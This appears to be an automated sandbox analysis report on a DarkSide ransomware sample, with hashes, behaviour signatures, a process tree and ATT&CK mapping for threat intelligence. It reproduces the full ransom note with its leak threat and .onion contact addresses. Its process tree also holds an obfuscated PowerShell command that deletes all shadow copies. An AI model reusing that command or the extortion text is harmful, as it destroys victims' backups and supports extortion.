Analysis

  • max time kernel
    111s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-05-2021 19:34

General

  • Target

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe

  • Size

    59KB

  • MD5

    9e779da82d86bcd4cc43ab29f929f73f

  • SHA1

    e6b47869caa776840ab79856b04096152103c71d

  • SHA256

    68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7

  • SHA512

    e0a172b862054b63c26e8852019cbd46b68c6102e4bae802ba851ae950798d336295795c0cc5d68002a0467c62e5800f1ecfdae05de2709d57bcc31375276bb7

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] ------------->

What happend?
----------------------------------------------
Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.
But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.
Follow our instructions below and you will recover all your data.

Data leak
----------------------------------------------
First of all we have uploaded more then 30GB data.

These files include:
- Accounting
- Finance
- Internal documents
- Insurance

Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv
On the page you will find examples of files that have been downloaded.
The data is preloaded and will be automatically published if you do not pay.
After publication, your data will be available for at least 6 months on our tor cdn servers.

We are ready:
- To provide you the evidence of stolen data
- To delete all the stolen data.

What guarantees?
----------------------------------------------
We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.
All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.
We guarantee to decrypt one file for free. Go to the site and contact us.

How to get access on website?
----------------------------------------------
Using a TOR browser:
1) Download and install TOR browser from this site: https://torproject.org/
2) Open our website: http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM

When you open our website, put the following data in the input form:
Key:
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

!!! DANGER !!!
DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.
!!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/blog/article/id/88/EbDyhFDs_z2hYxVR0XHv4S3ZzHUrKh4rqa3bgZ44Og-ORPgEAgMjzoTDuM46leXv

http://darksidfqzcuhtk2.onion/KB0LXKYKN6E96Z7RFYWCEI6NM03TX93VZCL5EDA4IVPXUIQQZBG2ZEG269ZIFSFM

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe
    "C:\Users\Admin\AppData\Local\Temp\68872cc22fbdf0c2f69c32ac878ba9a7b7cf61fe5dd0e3da200131b8b23438e7.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:912
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Modify Registry (T1112): 1
  • Credential Access
    Credentials in Files (T1081): 1
  • Collection
    Data from Local System (T1005): 1
  • Impact
    Defacement (T1491): 1

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    6f342e9161e85caac1a2a3d2526a9110

    SHA1

    1be2bd7269c56802c80d82849eff1dde2e987ee8

    SHA256

    7b44a501572f537ac640273808696bdbb6745029e45c00443cdc7fb7e0256745

    SHA512

    d62bd45bc980c1162147e6895502e7c4f65f8ce0e4f39962016e8bad7fb0e3037cb1cd7c1ed54e6252af6c022fbc9c1d51d07d16a5470e263a9cb28e2e0d5bed

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    8e8ae682256cfa4045f41c50be73bce3

    SHA1

    114fe5bf02bb429ff3df60e311b29dee1e646c75

    SHA256

    fe8a510581dfb16ccd52432f59b80b8fa67f38a11cc7b4df60c5dd6e5e751c95

    SHA512

    41ee064d2c250e6bdc48174397e2938dab777c7797b3ba4c2d74298f1a52d642236a2ac8c7f45dbf9705a47a3b84fa9e4abd1758e9afedb4517a26d6e7dc6690

  • memory/912-66-0x0000000002070000-0x0000000002071000-memory.dmp
    Filesize

    4KB

  • memory/912-63-0x0000000002030000-0x0000000002031000-memory.dmp
    Filesize

    4KB

  • memory/912-64-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
    Filesize

    4KB

  • memory/912-65-0x0000000002550000-0x0000000002551000-memory.dmp
    Filesize

    4KB

  • memory/912-67-0x000000001AB20000-0x000000001AB22000-memory.dmp
    Filesize

    8KB

  • memory/912-68-0x000000001AB24000-0x000000001AB26000-memory.dmp
    Filesize

    8KB

  • memory/912-69-0x000000001C5F0000-0x000000001C5F1000-memory.dmp
    Filesize

    4KB

  • memory/912-70-0x000000001C410000-0x000000001C411000-memory.dmp
    Filesize

    4KB

  • memory/912-62-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
    Filesize

    8KB

  • memory/912-61-0x0000000000000000-mapping.dmp
  • memory/1872-60-0x0000000075631000-0x0000000075633000-memory.dmp
    Filesize

    8KB